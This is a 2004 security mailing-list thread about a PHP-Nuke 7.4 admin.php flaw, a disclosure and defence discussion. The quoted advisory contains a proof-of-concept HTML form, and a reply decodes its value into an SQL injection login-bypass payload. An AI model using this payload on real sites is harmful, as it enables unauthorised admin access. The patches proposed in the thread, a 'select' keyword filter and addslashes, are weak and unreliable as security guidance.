I don't know much about the bug itself, but if it's an SQL injection bug
doing a case-insensitive search for "select" probably isn't going to fix
it properly. What if it was an update changing the admin password? Or a
query dropping the table as a DoS? Etc. Adding
$aid = addslashes($aid);
beforehand seems like a more sensible "fix".
cheers,
Peter
On Sep 05, Blaine Elzey wrote:
> This seems like more of a SQL injection bug.
>
> $admin value "eCcgVU5JT04gU0VMRUNUIDEvKjox" decodes to "x' UNION SELECT 1/*:1"
> which will cause the pwd check to be manipulated into union selecting the
> valid password.
>
> 7.4 Patch can be in auth.php, replace line (about) 61
> if ($aid=="" || $pwd=="") {
> with
> if ($aid=="" || $pwd=="" || stristr($aid,'select')) {
>
> I don't know if 7.5 is also vulnerable.
>
> Blaine Elzey
> --
> Powered by: Open WebMail Project (http://openwebmail.org)
>
>
> ---------- Original Message -----------
> From: Pierquinto Manco <mantra@xxxxxx>
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Sent: 4 Sep 2004 08:19:26 -0000
> Subject: [XSS] PHP-Nuke 7.4 ViewAdmin Bug
>
> > **************************************************************
> > * CODEBUG Labs
> > * Advisory #3
> > * Title: ViewAdmin Bug
> > * Author: Pierquinto 'Mantra' Manco
> > * Product: PHP-Nuke 7.4
> > * Type: XSS
> > * Web: http://www.mantralab.org
> > *
> > **************************************************************
> >
> > View Admin Bug
> >
> > - ) Description
> > PHP-Nuke is a very bugged web CMS, version 7.4 has critical
> > XSS bug that permit to an attacker to view Admin account aid
> > and to use this information to delete account using Delete Admin Bug
> > (CODEBUG #2).
> > This bug is very old too but we can bypass the patch sending data
> > by POST instead of GET.
> >
> > - ) Proof-of-Concept
> > Create a HTML file with this lines:
> >
> > <form name="form1" method="POST"
> action="http://www.sitewithphpnuke.com/admin.php";>
> > <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
> > <br>
> > <input type="hidden" name="add_radminsuper" value="1">
> > <br>
> > <input type="hidden" name="op" value="mod_authors">
> > <input type="submit" name="Submit" value="Display">
> > <br>
> > </p>
> > </form>
> >
> > - ) Patch
> >
> > Apply this code to your admin.php file:
> >
> > if ( !empty($HTTP_GET_VARS['op']) ) {
> > $op = $HTTP_GET_VARS['op'];
> > }
> >
> > if ( !empty($HTTP_POST_VARS['op']) ) {
> > $op = $HTTP_POST_VARS['op'];
> > }
> >
> > -) Note
> >
> > There are a lot of this problem in PHP-Nuke 7.4, my patch will check
> > the content of $_POST[op] and $_GET[op].
> > I'm going to post all this vulnerabilities on my site...
> > http://www.mantralab.org
> >
> > **************************************************************
> > http://www.mantralab.org
> > **************************************************************
> ------- End of Original Message -------
>
>
--
The Czech Republic: Home of the world's finest beer.
Litres drunk by Czechs so far this year: 1,131,898,570.28
- http://prague.tv/toys/beer/
